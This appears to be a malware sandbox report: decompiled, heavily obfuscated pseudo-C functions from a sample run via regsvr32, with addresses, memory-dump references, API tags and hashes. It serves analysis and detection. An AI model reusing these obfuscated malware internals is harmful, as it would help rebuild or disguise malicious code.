			E04F785A7(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v44;
				char* _v48;
				char* _v52;
				intOrPtr _v56;
				char _v60;
				char _v580;
				char _v1100;
				void* _t226;
				signed int _t263;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				signed int _t275;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t226);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xb41f;
				_v20 = 0x414284;
				_t267 = 3;
				_v20 = _v20 / _t267;
				_v20 = _v20 ^ 0x0015d673;
				_v16 = 0x3d836;
				_t268 = 0x64;
				_v16 = _v16 * 0x69;
				_v16 = _v16 ^ 0x0191083f;
				_v12 = 0xc1b3c;
				_v12 = _v12 + 0x6e9e;
				_v12 = _v12 ^ 0x0000899a;
				_v8 = 0x342002;
				_v8 = _v8 / _t268;
				_v8 = _v8 ^ 0x0005d359;
				E04F6E8B9(_v20, _v16, 0x1e, _v12, _v8,  &_v60);
				_v12 = 0xf78084;
				_v12 = _v12 + 0xffffc196;
				_v12 = _v12 + 0x1f1a;
				_v12 = _v12 ^ 0x00f6f2a3;
				_v8 = 0xfae489;
				_v8 = _v8 * 7;
				_v8 = _v8 ^ 0x969438a4;
				_v8 = _v8 ^ 0x90451665;
				_v16 = 0x451e46;
				_v16 = _v16 | 0xc29c2b45;
				_v16 = _v16 + 0xffff3459;
				_v16 = _v16 + 0xffffd05b;
				_v16 = _v16 ^ 0xc2d03692;
				_v20 = 0x5fe71a;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x000bc45b;
				E04F6E8B9(_v12, _v8, 0x208, _v16, _v20,  &_v580);
				_v20 = 0xca687f;
				_v20 = _v20 | 0x73def698;
				_v20 = _v20 ^ 0x73db900e;
				_v8 = 0x59302;
				_t271 = 0x17;
				_v8 = _v8 / _t271;
				_v8 = _v8 << 5;
				_v8 = _v8 + 0x4183;
				_v8 = _v8 ^ 0x000bf78d;
				_v12 = 0xa47e03;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 + 0x5b75;
				_v12 = _v12 << 1;
				_v12 = _v12 ^ 0x0001d29b;
				_v16 = 0x3c3caa;
				_v16 = _v16 * 0x69;
				_v16 = _v16 + 0xffff7b2e;
				_v16 = _v16 | 0x7275f5e4;
				_v16 = _v16 ^ 0x7afbbc42;
				E04F6E8B9(_v20, _v8, 0x208, _v12, _v16,  &_v1100);
				_v12 = 0xcdd10f;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 >> 0x10;
				_t273 = 0x2c;
				_v12 = _v12 * 0xd;
				_v12 = _v12 ^ 0x000def54;
				_v8 = 0x8305af;
				_v8 = _v8 + 0xffff1b65;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0xaadefcca;
				_v8 = _v8 ^ 0xaad24a2c;
				_v16 = 0xac880;
				_v16 = _v16 * 0x6b;
				_v16 = _v16 / _t273;
				_v16 = _v16 ^ 0x0018e35d;
				E04F76D54(_v12, _v8, _a4, _v16,  &_v580);
				_v12 = 0xa3a887;
				_v12 = _v12 | 0xb51f6647;
				_v12 = _v12 ^ 0x6ae35eb5;
				_v12 = _v12 + 0xb6cb;
				_v12 = _v12 ^ 0xdf5d3225;
				_v16 = 0x273e88;
				_v16 = _v16 << 6;
				_t275 = 0x6c;
				_v16 = _v16 / _t275;
				_v16 = _v16 ^ 0x001b2860;
				_v8 = 0xaa4517;
				_v8 = _v8 * 0x7d;
				_v8 = _v8 * 0x54;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0xe1a9b0b4;
				E04F76D54(_v12, _v16, __ecx, _v8,  &_v1100);
				_v56 = 1;
				_v52 =  &_v580;
				_v48 =  &_v1100;
				_v16 = 0xaeb9ce;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x000004ae;
				_v12 = 0x9aeb8d;
				_v12 = _v12 * 0x37;
				_v12 = _v12 ^ 0x21489b5b;
				_v8 = 0x9fc24a;
				_v8 = _v8 | 0xe5960c36;
				_v8 = _v8 ^ 0xe59fc67e;
				_v20 = 0xbd10ba;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x0000057a;
				_v44 = _v20 | _v8 | _v12 | _v16;
				_v20 = 0x6852c2;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x14bc1f1e;
				_v8 = 0x8919da;
				_v8 = _v8 | 0x134d1039;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x79a5d7b7;
				_t263 = E04F6FD31(_v20, _v8,  &_v60); // executed
				asm("sbb eax, eax");
				return  ~_t263 + 1;
			}

0x04f785b2
0x04f785b7
0x04f785ba
0x04f785bd
0x04f785be
0x04f785bf
0x04f785c4
0x04f785ca
0x04f785d1
0x04f785dd
0x04f785e2
0x04f785e7
0x04f785ee
0x04f785f9
0x04f785fa
0x04f785fd
0x04f78604
0x04f7860b
0x04f78612
0x04f78619
0x04f78625
0x04f7862b
0x04f78641
0x04f78646
0x04f78652
0x04f78659
0x04f78660
0x04f78667
0x04f78672
0x04f7867b
0x04f78682
0x04f78689
0x04f78690
0x04f78697
0x04f7869e
0x04f786a5
0x04f786ac
0x04f786b3
0x04f786b7
0x04f786cc
0x04f786d1
0x04f786da
0x04f786e1
0x04f786e8
0x04f786f4
0x04f786f7
0x04f786fa
0x04f786fe
0x04f78705
0x04f7870c
0x04f78713
0x04f78717
0x04f7871e
0x04f78721
0x04f78728
0x04f78733
0x04f7873c
0x04f78743
0x04f7874a
0x04f7875f
0x04f78764
0x04f7876e
0x04f78774
0x04f7877e
0x04f7877f
0x04f78782
0x04f78789
0x04f78790
0x04f78797
0x04f7879b
0x04f787a2
0x04f787a9
0x04f787b4
0x04f787bc
0x04f787c5
0x04f787d9
0x04f787de
0x04f787e7
0x04f787ee
0x04f787f5
0x04f787fc
0x04f78803
0x04f7880a
0x04f78813
0x04f78816
0x04f78819
0x04f78820
0x04f7882b
0x04f78832
0x04f7883b
0x04f7883f
0x04f78851
0x04f7885c
0x04f78863
0x04f7886c
0x04f7886f
0x04f78876
0x04f7887a
0x04f78881
0x04f7888c
0x04f7888f
0x04f78896
0x04f7889d
0x04f788a4
0x04f788ab
0x04f788b2
0x04f788b6
0x04f788c9
0x04f788d0
0x04f788d7
0x04f788db
0x04f788e2
0x04f788e9
0x04f788f0
0x04f788f4
0x04f78902
0x04f7890c
0x04f78914

Strings

T, xrefs: 04F78782

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: T
API String ID: 0-1685445149
Opcode ID: 6ed505d223484581787f62122bf8b6a6edd6ce437d3a7934b6b6cdf14131937f
Instruction ID: a87f79017d5696a965c88a35b2d5f4a428ad9f635a7b15adf946bb939e0d7988
Opcode Fuzzy Hash: 6ed505d223484581787f62122bf8b6a6edd6ce437d3a7934b6b6cdf14131937f
Instruction Fuzzy Hash: D4B1CDB5C0121DEBDB45CFE1C98A9DEBBB5FF44308F20809AD525A6260D7B85B48DF40

Uniqueness

Uniqueness Score: -1.00%

Function 04F6E51F Relevance: 1.4, Strings: 1, Instructions: 113
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E04F6E51F(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v540;
				void* _t122;
				void* _t125;
				void* _t138;
				signed int _t142;
				signed int _t144;
				void* _t159;

				_t159 = __eflags;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t122);
				_v20 = 0x5e825;
				_v20 = 0x830974;
				_v20 = _v20 + 0x4e54;
				_v20 = _v20 ^ 0x008eed74;
				_v12 = 0xae711e;
				_v12 = _v12 ^ 0xea1b3b1c;
				_v12 = _v12 ^ 0x55188e47;
				_v12 = _v12 ^ 0xbfab21fc;
				_v8 = 0xc38a16;
				_v8 = _v8 | 0x1c2accb7;
				_v8 = _v8 >> 4;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x0009c27b;
				_v16 = 0xc1b2e4;
				_v16 = _v16 * 0x1e;
				_v16 = _v16 ^ 0x16b1ac5f;
				_t125 = E04F7D6A7(_v20, _v12, _v8, 0x4f611d4, _v16);
				_v8 = 0xccde0b;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x0004c248;
				_v12 = 0xddaf40;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x0dd25662;
				_v16 = 0xf8f8b1;
				_v16 = _v16 >> 1;
				_v16 = _v16 ^ 0x00788e21;
				_v20 = 0xca1b40;
				_v20 = _v20 * 0x57;
				_v20 = _v20 ^ 0x44a40c98;
				E04F79E2F(_v12, _t159,  &_v540, _t125, _v16, _a4, _v20, _v20);
				_v16 = 0x89baa1;
				_t142 = 0x4d;
				_v16 = _v16 * 0x60;
				_v16 = _v16 * 0x66;
				_v16 = _v16 ^ 0x94230adc;
				_v20 = 0x3b06fb;
				_v20 = _v20 << 0xd;
				_v20 = _v20 ^ 0x60d9f897;
				_v12 = 0x3d943f;
				_v12 = _v12 * 0x23;
				_v12 = _v12 / _t142;
				_v12 = _v12 ^ 0x0013cf5f;
				_v8 = 0x82e1ed;
				_v8 = _v8 + 0x493d;
				_v8 = _v8 + 0xffff8c2f;
				_v8 = _v8 * 0x56;
				_v8 = _v8 ^ 0x2bef70ca;
				E04F6845B(_v16, _v20, _v12, _v8, _t125);
				_v12 = 0x247619;
				_t144 = 0x7d;
				_v12 = _v12 / _t144;
				_v12 = _v12 ^ 0x86dd2f59;
				_v12 = _v12 ^ 0xe57fcbbe;
				_v12 = _v12 ^ 0x63a58333;
				_v8 = 0xe96c57;
				_v8 = _v8 ^ 0xeb4feb9e;
				_v8 = _v8 + 0xffff4fb1;
				_v8 = _v8 ^ 0xe6b2c132;
				_v8 = _v8 ^ 0x0d15fdf2;
				_t138 = E04F758BD( &_v540, _v12, _v8); // executed
				return _t138;
			}

0x04f6e51f
0x04f6e529
0x04f6e52c
0x04f6e52f
0x04f6e532
0x04f6e533
0x04f6e534
0x04f6e539
0x04f6e540
0x04f6e547
0x04f6e54e
0x04f6e555
0x04f6e55c
0x04f6e563
0x04f6e56a
0x04f6e571
0x04f6e578
0x04f6e57f
0x04f6e583
0x04f6e587
0x04f6e58e
0x04f6e599
0x04f6e59c
0x04f6e5b4
0x04f6e5b9
0x04f6e5c2
0x04f6e5c9
0x04f6e5d0
0x04f6e5d7
0x04f6e5db
0x04f6e5e2
0x04f6e5e9
0x04f6e5ec
0x04f6e5f3
0x04f6e5fe
0x04f6e607
0x04f6e620
0x04f6e625
0x04f6e634
0x04f6e636
0x04f6e63d
0x04f6e640
0x04f6e647
0x04f6e64e
0x04f6e652
0x04f6e659
0x04f6e664
0x04f6e66c
0x04f6e66f
0x04f6e676
0x04f6e67d
0x04f6e684
0x04f6e68f
0x04f6e692
0x04f6e6a5
0x04f6e6aa
0x04f6e6b8
0x04f6e6c1
0x04f6e6c4
0x04f6e6cb
0x04f6e6d2
0x04f6e6d9
0x04f6e6e0
0x04f6e6e7
0x04f6e6ee
0x04f6e6f5
0x04f6e702
0x04f6e70e

Strings

Wl, xrefs: 04F6E6D9

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: Wl
API String ID: 4033686569-1238517414
Opcode ID: 45032515a13a29e555cf66b54291421f706423c607e99542f747e705985e5845
Instruction ID: 2fc3dae07c82ff340623f07f473a701bff1b0673e44556902b12b81534ae347d
Opcode Fuzzy Hash: 45032515a13a29e555cf66b54291421f706423c607e99542f747e705985e5845
Instruction Fuzzy Hash: 9151E0B5C01209EBCF09DFE1C98A9DEBBB5FF14308F208189D526A6260D7B45B45EF40

Uniqueness

Uniqueness Score: -1.00%

Function 04F656AD Relevance: 1.4, Strings: 1, Instructions: 106
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04F656AD(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t123;
				intOrPtr _t128;
				signed int _t136;
				signed int _t137;
				intOrPtr _t139;
				signed int _t140;

				_v24 = _v24 & 0x00000000;
				_v28 = 0x498a6;
				_v12 = 0xbc60dd;
				_v12 = _v12 * 0x64;
				_v12 = _v12 * 0x1c;
				_v12 = _v12 + 0xffff3358;
				_v12 = _v12 ^ 0x0c64fb8c;
				_v16 = 0x33b2b8;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x65203bc3;
				_v16 = _v16 ^ 0x652cb7b7;
				_v8 = 0x92dceb;
				_v8 = _v8 * 0x70;
				_v8 = _v8 * 0x11;
				_v8 = _v8 + 0xf094;
				_v8 = _v8 ^ 0x444a43e0;
				_v20 = 0x7cea12;
				_v20 = _v20 + 0x25fd;
				_v20 = _v20 ^ 0x00771719;
				_t35 =  &_v8; // 0x444a43e0
				_t123 = E04F7D6A7(_v12, _v16,  *_t35, __ecx, _v20);
				_v20 = 0x92eabb;
				_v20 = _v20 + 0xfffff52e;
				_v20 = _v20 ^ 0xda09c73c;
				_v20 = _v20 ^ 0xda980227;
				_v16 = 0x8d2d56;
				_v16 = _v16 * 0x42;
				_v16 = _v16 * 0x34;
				_v16 = _v16 ^ 0x64a88940;
				_v8 = 0x4adb7;
				_t136 = 0x64;
				_v8 = _v8 / _t136;
				_v8 = _v8 | 0xa9d321ca;
				_v8 = _v8 ^ 0x9dfae6e5;
				_v8 = _v8 ^ 0x342bd2da;
				_v12 = 0xd27864;
				_t137 = 0x53;
				_v12 = _v12 / _t137;
				_v12 = _v12 << 0xe;
				_v12 = _v12 + 0xffff2242;
				_v12 = _v12 ^ 0xa244c6fe;
				_t128 = E04F7F6A1(_v20, _t123, _v16, _v8, _v12);
				_t139 =  *0x4f82210; // 0x33c43d0
				 *((intOrPtr*)(_t139 + 0x14 + __edx * 4)) = _t128;
				_v8 = 0x40b9de;
				_v8 = _v8 | 0x08a1aa8e;
				_v8 = _v8 ^ 0x08efabbb;
				_v16 = 0x29a479;
				_v16 = _v16 ^ 0xa8b7f47a;
				_v16 = _v16 ^ 0xa89e4dce;
				_v12 = 0x65c5c2;
				_v12 = _v12 | 0x70ff2193;
				_v12 = _v12 << 6;
				_t140 = 0x47;
				_v12 = _v12 / _t140;
				_v12 = _v12 ^ 0x00e16f94;
				_v20 = 0xfeb97a;
				_v20 = _v20 + 0x60a1;
				_v20 = _v20 ^ 0xe49a0cc4;
				_v20 = _v20 ^ 0xe461e68d;
				return E04F6845B(_v8, _v16, _v12, _v20, _t123);
			}

0x04f656b3
0x04f656b7
0x04f656be
0x04f656cd
0x04f656d4
0x04f656d7
0x04f656de
0x04f656e5
0x04f656ec
0x04f656f0
0x04f656f7
0x04f656fe
0x04f65709
0x04f65710
0x04f65713
0x04f6571a
0x04f65721
0x04f65728
0x04f6572f
0x04f6573a
0x04f65743
0x04f65748
0x04f65751
0x04f6575a
0x04f65761
0x04f65768
0x04f65775
0x04f6577c
0x04f6577f
0x04f65786
0x04f65790
0x04f65795
0x04f6579a
0x04f657a1
0x04f657a8
0x04f657af
0x04f657b9
0x04f657be
0x04f657c1
0x04f657c5
0x04f657cc
0x04f657df
0x04f657e4
0x04f657ea
0x04f657ee
0x04f657f5
0x04f657fc
0x04f65803
0x04f6580a
0x04f65811
0x04f65818
0x04f6581f
0x04f65826
0x04f6582f
0x04f65835
0x04f65838
0x04f6583f
0x04f65846
0x04f6584d
0x04f65854
0x04f65874

Strings

CJD, xrefs: 04F6573A

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: CJD
API String ID: 1029625771-581177577
Opcode ID: eb7a78733948cb4ffca400f58d3121527d2083bd3e5a46a8a2a7085396693328
Instruction ID: 7de562bbacf4a217ac05bb93dcbbd89bdc8124c13036c3818c5d8d228663a264
Opcode Fuzzy Hash: eb7a78733948cb4ffca400f58d3121527d2083bd3e5a46a8a2a7085396693328
Instruction Fuzzy Hash: 4C51EFB1D01219EBCF48CFA5C98A99EFBB2FB44304F20C199D022B6260D7B85B55DF81

Uniqueness

Uniqueness Score: -1.00%

Function 04F73EE6 Relevance: 1.3, Strings: 1, Instructions: 59
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E04F73EE6(void* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t60;
				void* _t63;
				signed int _t72;

				_v36 = 0xfb46f;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x99dbd2;
				_v12 = _v12 + 0xffffa9dc;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x00043b44;
				_v8 = 0xe1a83c;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0x1e62ccbf;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x2d9ea883;
				_t60 = E04F6D551(__ecx);
				_v20 = 0xd6fb64;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0xfb640008;
				_v16 = 0x8e3710;
				_t72 = 0x5d;
				_v16 = _v16 / _t72;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000656d0;
				_v8 = 0xf1fd4c;
				_v8 = _v8 ^ 0x18dac9bf;
				_v8 = _v8 + 0x8ea3;
				_v8 = _v8 ^ 0x1822ef65;
				_v12 = 0x47c4be;
				_v12 = _v12 + 0x97f1;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x485e1f1d;
				_t63 = E04F62CC4(_v16, _t60, _v20, _v8, __edx, _v12); // executed
				return _t63;
			}

0x04f73eec
0x04f73efc
0x04f73efd
0x04f73efe
0x04f73eff
0x04f73f06
0x04f73f0d
0x04f73f11
0x04f73f15
0x04f73f1c
0x04f73f23
0x04f73f27
0x04f73f2e
0x04f73f32
0x04f73f3f
0x04f73f44
0x04f73f4d
0x04f73f53
0x04f73f5a
0x04f73f66
0x04f73f6b
0x04f73f6e
0x04f73f72
0x04f73f79
0x04f73f80
0x04f73f87
0x04f73f8e
0x04f73f95
0x04f73f9c
0x04f73fa3
0x04f73fa7
0x04f73fbb
0x04f73fc8

Strings

CJD, xrefs: 04F73EE6

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: CJD
API String ID: 1279760036-581177577
Opcode ID: 51d36c6ee1d6e9cbeb2484832ce0951e94398d31190a534f8565fa44d0b3b4a7
Instruction ID: cc328d875bbd98ba0c7db1b6f37176d243c971248569f3a514d0fc8b75c017bf
Opcode Fuzzy Hash: 51d36c6ee1d6e9cbeb2484832ce0951e94398d31190a534f8565fa44d0b3b4a7
Instruction Fuzzy Hash: 7B2110B1E0121CEBDB59DFE9C9494DEFBB1EB40718F6081A9D522A7250C3B40B59DF80

Uniqueness

Uniqueness Score: -1.00%

Function 100281D9 Relevance: 15.1, APIs: 10, Instructions: 99
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E100281D9(signed char* __ecx) {
				struct _CRITICAL_SECTION* _v8;
				void* _v12;
				char _v32;
				char _v40;
				char _v48;
				signed int __edi;
				void* __esi;
				struct _CRITICAL_SECTION* _t41;
				intOrPtr _t42;
				void* _t43;
				void* _t44;
				void* _t48;
				void* _t49;
				signed int _t70;
				signed char* _t72;
				signed int _t81;
				signed char* _t84;
				void* _t86;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_t72 = __ecx;
				_t88 = _t93;
				_push(__ecx);
				_push(__ecx);
				_t84 = __ecx;
				_t1 = _t84 + 0x1c; // 0x10039e60
				_t41 = _t1;
				_v8 = _t41;
				EnterCriticalSection(_t41);
				_t3 = _t84 + 4; // 0x20
				_t42 =  *_t3;
				_t4 = _t84 + 8; // 0x3
				if( *_t4 >= _t42) {
					L5:
					_t81 = 1;
					if(_t42 <= 1) {
						L10:
						_t19 = _t42 + 0x20; // 0x40
						_t70 = _t19;
						_t20 = _t84 + 0x10; // 0x33f64a0
						_t43 =  *_t20;
						if(_t43 != 0) {
							_t44 = GlobalHandle(_t43);
							_v12 = _t44;
							GlobalUnlock(_t44);
							_t48 = GlobalReAlloc(_v12, _t70 << 3, 0x2002);
						} else {
							_t48 = GlobalAlloc(2, _t70 << 3); // executed
						}
						if(_t48 != 0) {
							_t49 = GlobalLock(_t48);
							_t25 = _t84 + 4; // 0x20
							_v12 = _t49;
							E10012400(_t49 +  *_t25 * 8, 0, _t70 -  *_t25 << 3);
							 *(_t84 + 4) = _t70;
							 *(_t84 + 0x10) = _v12;
							goto L18;
						} else {
							_t23 = _t84 + 0x10; // 0x33f64a0
							_t86 =  *_t23;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v8);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v32 = 0x10039c78;
							E100125AC( &_v32, 0x10032648);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_v40 = 0x10039d10;
							E100125AC( &_v40, 0x1003268c);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_v48 = 0x10039da8;
							E100125AC( &_v48, 0x100326d0);
							asm("int3");
							return 0x1002e140;
						}
					} else {
						_t16 = _t84 + 0x10; // 0x33f64a0
						_t72 =  *_t16 + 8;
						while(( *_t72 & 0x00000001) != 0) {
							_t81 = _t81 + 1;
							_t72 =  &(_t72[8]);
							if(_t81 < _t42) {
								continue;
							}
							break;
						}
						if(_t81 < _t42) {
							goto L18;
						} else {
							goto L10;
						}
					}
				} else {
					_t11 = __esi + 0x10; // 0x33f64a0
					__ecx =  *_t11;
					if(( *( *_t11 + __edi * 8) & 0x00000001) == 0) {
						L18:
						_t32 = _t84 + 0xc; // 0x3
						if(_t81 >=  *_t32) {
							_t33 = _t81 + 1; // 0x4
							 *((intOrPtr*)(_t84 + 0xc)) = _t33;
						}
						_t35 = _t84 + 0x10; // 0x33f64a0
						 *( *_t35 + _t81 * 8) =  *( *_t35 + _t81 * 8) | 0x00000001;
						_t39 = _t81 + 1; // 0x4
						 *((intOrPtr*)(_t84 + 8)) = _t39;
						LeaveCriticalSection(_v8);
						return _t81;
					} else {
						goto L5;
					}
				}
			}

0x100281d9
0x100281da
0x100281dc
0x100281dd
0x100281e0
0x100281e2
0x100281e2
0x100281e7
0x100281ea
0x100281f0
0x100281f0
0x100281f3
0x100281f8
0x10028207
0x10028209
0x1002820c
0x10028229
0x10028229
0x10028229
0x1002822c
0x1002822c
0x10028231
0x10028244
0x1002824b
0x1002824e
0x10028262
0x10028233
0x1002823b
0x1002823b
0x1002826a
0x10028290
0x10028296
0x100282a1
0x100282aa
0x100282b5
0x100282b8
0x00000000
0x1002826c
0x1002826c
0x1002826c
0x10028271
0x1002827b
0x1002827b
0x10028284
0x1001d1db
0x1001d1dc
0x1001d1de
0x1001d1e8
0x1001d1ef
0x1001d1f4
0x1001d1f5
0x1001d1f6
0x1001d1f8
0x1001d202
0x1001d209
0x1001d20e
0x1001d20f
0x1001d212
0x1001d21c
0x1001d223
0x1001d228
0x1001d22e
0x1001d22e
0x1002820e
0x1002820e
0x10028211
0x10028214
0x10028219
0x1002821a
0x1002821f
0x00000000
0x00000000
0x00000000
0x1002821f
0x10028223
0x00000000
0x00000000
0x00000000
0x00000000
0x10028223
0x100281fa
0x100281fa
0x100281fa
0x10028201
0x100282bb
0x100282bb
0x100282be
0x100282c0
0x100282c3
0x100282c3
0x100282c6
0x100282cf
0x100282d2
0x100282d5
0x100282d8
0x100282e4
0x00000000
0x00000000
0x00000000
0x10028201

APIs

EnterCriticalSection.KERNEL32(10039E60,00000000,?,?,10039E44,10039E44,?,10028627,00000000,?,?,10027756,100272A4,10027772,1001E169,10006E4C), ref: 100281EA
GlobalAlloc.KERNELBASE(00000002,00000040,?,?,10039E44,10039E44,?,10028627,00000000,?,?,10027756,100272A4,10027772,1001E169,10006E4C), ref: 1002823B
GlobalHandle.KERNEL32(033F64A0), ref: 10028244
GlobalUnlock.KERNEL32(00000000,?,?,10039E44,10039E44,?,10028627,00000000,?,?,10027756,100272A4,10027772,1001E169,10006E4C,?), ref: 1002824E
GlobalReAlloc.KERNEL32 ref: 10028262
GlobalHandle.KERNEL32(033F64A0), ref: 10028274
GlobalLock.KERNEL32 ref: 1002827B
LeaveCriticalSection.KERNEL32(?,?,?,10039E44,10039E44,?,10028627,00000000,?,?,10027756,100272A4,10027772,1001E169,10006E4C,?), ref: 10028284
GlobalLock.KERNEL32 ref: 10028290
LeaveCriticalSection.KERNEL32(?), ref: 100282D8

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: 5d27eb62a9a16ca5e94be886ee61e449629fb40b692c20ca73c00637330e3a18
Instruction ID: dbd813a6aa0f8bf5c178e234d1f0cd89eb832e94261be678814499acfecdaa95
Opcode Fuzzy Hash: 5d27eb62a9a16ca5e94be886ee61e449629fb40b692c20ca73c00637330e3a18
Instruction Fuzzy Hash: 22318974A01B15EFD720CFA4DC88A5ABBF9FB44344B518929E856D3660D730FA4ACB60

Uniqueness

Uniqueness Score: -1.00%

Function 10014B0C Relevance: 7.5, APIs: 5, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10014B0C() {
				int _t2;
				void* _t8;
				void* _t14;
				void** _t15;
				void* _t21;
				void* _t23;

				if( *0x1003b804 == 3) {
					_t8 = 0;
					_t21 =  *0x1003b7e8 - _t8; // 0x0
					if(_t21 > 0) {
						_t14 =  *0x1003b7ec; // 0x0
						_t15 = _t14 + 0xc;
						do {
							VirtualFree( *_t15, 0x100000, 0x4000);
							VirtualFree( *_t15, 0, 0x8000);
							HeapFree( *0x1003b800, 0, _t15[1]);
							_t15 =  &(_t15[5]);
							_t8 = _t8 + 1;
							_t23 = _t8 -  *0x1003b7e8; // 0x0
						} while (_t23 < 0);
					}
					HeapFree( *0x1003b800, 0,  *0x1003b7ec);
				}
				_t2 = HeapDestroy( *0x1003b800); // executed
				return _t2;
			}

0x10014b13
0x10014b16
0x10014b18
0x10014b25
0x10014b28
0x10014b35
0x10014b38
0x10014b44
0x10014b4f
0x10014b5c
0x10014b5e
0x10014b61
0x10014b62
0x10014b62
0x10014b6b
0x10014b7a
0x10014b7d
0x10014b84
0x10014b8a

APIs

VirtualFree.KERNEL32(-0000000C,00100000,00004000,00000000,?,?,?,10011847,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014B44
VirtualFree.KERNEL32(-0000000C,00000000,00008000,?,?,10011847,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014B4F
HeapFree.KERNEL32(00000000,?,?,?,10011847,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014B5C
HeapFree.KERNEL32(00000000,?,?,10011847,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014B7A
HeapDestroy.KERNELBASE(10011847,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014B84

Memory Dump Source

